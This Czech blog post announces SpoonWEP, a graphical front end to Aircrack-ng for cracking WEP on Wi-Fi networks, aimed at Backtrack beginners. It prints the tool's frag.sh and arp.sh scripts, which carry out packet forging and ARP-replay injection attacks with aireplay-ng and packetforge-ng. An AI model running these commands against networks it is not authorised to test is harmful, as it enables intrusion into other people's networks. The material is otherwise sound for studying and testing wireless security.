Nástroje na prolamování zabezpečení bezdrátových sítí, testování zranitelností a penetrační testy nezaznamenávají časté přírustky. O to větší nadšení zavládne v momentu kdy světlo světa spatří nějaká novinka nebo proof-of-concept. Dnes vám představíme jednoduchý grafický nástroj, kterého tvůrcem je autor nástroje Charon, o kterém se na airdump.cz psalo začátkem května. SpoonWEP je prográmek napsaný v Java a stejně jako Windows aplikace AiroWizard nebo již zmiňovaný Charon, jde „pouze“ o obal (nebo-li grafickou nástavbu) pro crackerský balík Aircrack-ng (airodump, aireplay, aircrack). Pouze jsem napsal záměrně, ano vím a fórum je toho důkazem, že i několik jednoduchých příkazů může uživately nadělat vítr. Tím se zároveň dostávame k tomu, že aplikace je primárně určena pro každého kdo dělá s penetrační distribuci Backtrack nebo WiFiSlax první kroky.
Celá aplikace je naprogramována, nebo spíše sestavena z několika jednoduchých skriptů, odsah frag.sh
APMAC=$1
CLIMAC=$2
CARD=$3
INJ=$4
ARP=“/tmp/arprequest“
sleep 2
cd /tmp
rm -f /tmp/*.cap;rm -f /tmp/*.xor;rm -f $ARP
aireplay-ng -F -x $INJ -m 144 -5 -b $APMAC -h $CLIMAC $CARD && xor=$(ls /tmp/*.xor)
packetforge-ng -0 -a $APMAC -h $CLIMAC -k 255.255.255.255 -l 255.255.255.255 -y $xor -w $ARP
aireplay-ng -F -x $INJ -2 -r $ARP -h $CLIMAC $CARD
..obsah souboru arp.sh
APMAC=$1
CLIMAC=$2
CARD=$3
INJ=$4
sleep 2
cd /tmp
rm -f /tmp/*.cap;rm -f /tmp/*.xor;
aireplay-ng -x $INJ -3 -b $APMAC -h $CLIMAC $CARD
..jako celek je ale spoonwep mocný nástroj, na kterém lze studovat proces automatizace. Dostupnost skriptů i pochopení základů pro psaní shell kódu. Pár screenshotů pro doplnění informací.
Konfigurační okno aplikace. Ze seznamu síťových karet vybart rozhraní bezdrátové karty které bude v aplikaci použita pro scan wifi sítí a injekci provozních dat. Třetí volba Mód je volitelná a lze ji změnit ještě v následujícím kroku.
Další panel slouží pouze k identifikaci bezdrátoví sítě a klienstkého zařízení.
Předposlední panel umožňuje zvolit jeden z útoků, možnost provést útok na WEP klíč v módu klient i v módu bez klientského zařízení.
Aplikace bude na požádaní přídána do české lokalizace live CD Backtrack mod. Pro stávající uživatele českého CD, DVD nebo USB je aplikace ke stažení v members area ve Fóru AirDump.cz (nutná registrace).
Kam dál?
- + Novinka IRC kanál na QuakeNet
+ Všem příznivcům serveru AMP anno Domini 2008
+ Nvidia GTX480 vs ATI HD 5970 – crack WPA – Pyrit benchmark
+ Nový dedikovaný server (mirror) pro data
+ Publikace Hacking Linksys WRT54G
+ Cookie stealer WiFi Zoo česky
+ Crack WPA-PSK – Nvidia CUDA Ubuntu 10.04 LTS – Pyrit & Cowpatty
+ Sniffing šifrované komunikace SSL (Secure Sockets Layer)
+ Wifislax 3.0 Linux live CD pro Geeka
+ Webová RSS čtečka – Novinky ze světa bezpečnosti
+ Bluetooth RAW Mode sniffing firmware upgrade
+ BackTrack 4.5 Summer Storm Cz DVD – Public verze
+ Statistika návštěvnosti AMP Sec [airdump.cz]
+ Tréning dovedností exploitácie operačných systémov – VMware
+ Instalujeme operační systém na virtuální počítač
+ Sniffing hesel LAN, WLAN sítě Cain, Wireshark, Ettercap
+ VoIPong Sniffing internetové telefonie
+ Cowpatty patch – Úprava pro slovníkový útok
+ Sniffing a analýza WiFi sítě – Nápověda pro Kismet NewCore
